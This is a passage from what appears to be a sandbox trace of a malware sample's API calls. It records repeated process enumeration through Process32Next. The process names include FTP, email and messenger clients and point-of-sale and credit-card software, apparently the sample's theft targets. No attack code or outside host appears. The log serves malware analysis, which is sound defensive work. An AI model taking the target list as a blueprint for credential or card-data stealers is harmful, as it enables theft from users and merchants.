dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.509] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.510] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0085.511] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0085.513] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.515] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0085.516] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0085.517] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.519] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0085.520] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0085.522] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0085.523] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0085.524] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.526] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0085.527] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0085.529] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0085.530] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 [0085.532] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="have return physical.exe")) returned 1 [0085.533] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or level.exe")) returned 1 [0085.534] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="court camera.exe")) returned 1 [0085.536] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or-finger.exe")) returned 1 [0085.537] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel imagine recently.exe")) returned 1 [0085.538] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="school_for.exe")) returned 1 [0085.540] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whosefirmthe.exe")) returned 1 [0085.541] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="seat_raise_join.exe")) returned 1 [0085.543] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="formerbuildpresent.exe")) returned 1 [0085.546] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unittype.exe")) returned 1 [0085.547] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow.exe")) returned 1 [0085.548] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="rate.exe")) returned 1 [0085.550] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pushweight.exe")) returned 1 [0085.551] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="film.exe")) returned 1 [0085.552] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="dead.exe")) returned 1 [0085.554] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="than.exe")) returned 1 [0085.555] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0085.557] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0085.558] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0085.561] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0085.562] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0085.564] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0085.565] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0085.567] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0085.569] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0085.572] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0085.574] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0085.576] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0085.577] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0085.579] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0085.581] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0085.583] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0085.585] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0085.586] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0085.588] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0085.590] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0085.592] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0085.593] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0085.595] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0085.597] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0085.599] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0085.601] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x920, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0085.602] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0085.604] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0085.605] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0085.611] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0085.613] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0085.615] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0085.617] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0085.620] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0085.622] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0085.623] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0085.625] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0085.627] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0085.628] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0085.630] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0085.632] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0085.634] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0085.635] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0085.637] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0085.639] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="through recognize.exe")) returned 1 [0085.641] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0085.642] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0085.644] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0085.646] CloseHandle (hObject=0x1484) returned 1 [0085.646] Sleep (dwMilliseconds=0x64) [0085.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1484 [0085.760] Process32First (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0085.762] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0085.764] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0085.766] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0085.768] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, 